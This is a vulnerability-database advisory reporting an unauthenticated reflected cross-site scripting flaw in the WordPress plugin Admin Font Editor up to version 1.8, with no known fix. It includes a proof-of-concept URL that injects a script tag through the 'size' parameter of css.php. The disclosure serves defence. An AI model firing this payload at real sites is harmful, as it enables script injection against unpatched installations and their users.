WordPress Plugin Vulnerabilities

Admin Font Editor <= 1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Description

The admin-font-editor WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

http://www.example.com/wp-content/plugins/admin-font-editor/css.php?size="><script>alert(1);</script><"

Affects Plugins

No known fix

References

Classification

Type
XSS
CWE

Miscellaneous

Submitter
ethicalhack3r
Submitter twitter
Verified
No

Timeline

Publicly Published
2016-04-13 (about 8 years ago)
Added
2016-04-13 (about 8 years ago)
Last Updated
2020-09-22 (about 3 years ago)

Other